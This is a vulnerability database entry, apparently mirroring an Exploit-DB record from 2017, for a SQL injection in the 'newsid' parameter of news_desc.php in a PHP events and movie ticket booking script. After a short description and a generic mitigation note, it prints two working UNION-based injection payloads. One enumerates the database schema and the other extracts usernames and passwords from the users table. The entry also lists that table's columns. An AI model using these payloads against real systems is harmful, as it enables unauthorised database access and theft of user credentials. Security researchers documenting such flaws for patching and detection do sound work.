Responsive Events & Movie Ticket Booking Script - SQL Injection

vendor:

Responsive Events & Movie Ticket Booking Script

by:

Ihsan Sencan

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Responsive Events & Movie Ticket Booking Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win7 x64, Kali Linux x64

2017

Responsive Events & Movie Ticket Booking Script – SQL Injection

An attacker can exploit a SQL injection vulnerability in Responsive Events & Movie Ticket Booking Script to gain access to sensitive information stored in the database. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'news_desc.php' script. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to access sensitive information such as usernames and passwords stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Responsive Events & Movie Ticket Booking Script - SQL Injection
# Google Dork: N/A
# Date: 06.03.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software : http://www.phpscriptsmall.com/product/responsive-events-movie-ticket-booking-script/
# Demo: http://theaterbookingscript.com/demo/advanced-ticketbooking/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/news_desc.php?newsid=[SQL]
# For example;
# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6-- -
# users :user_id
# users :email
# users :user_name
# users :password
# users :mobile
# users :country
# users :state
# -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,/*!13337Concat*/(user_name,0x3a,password),5,6+from+users-- -
# # # # #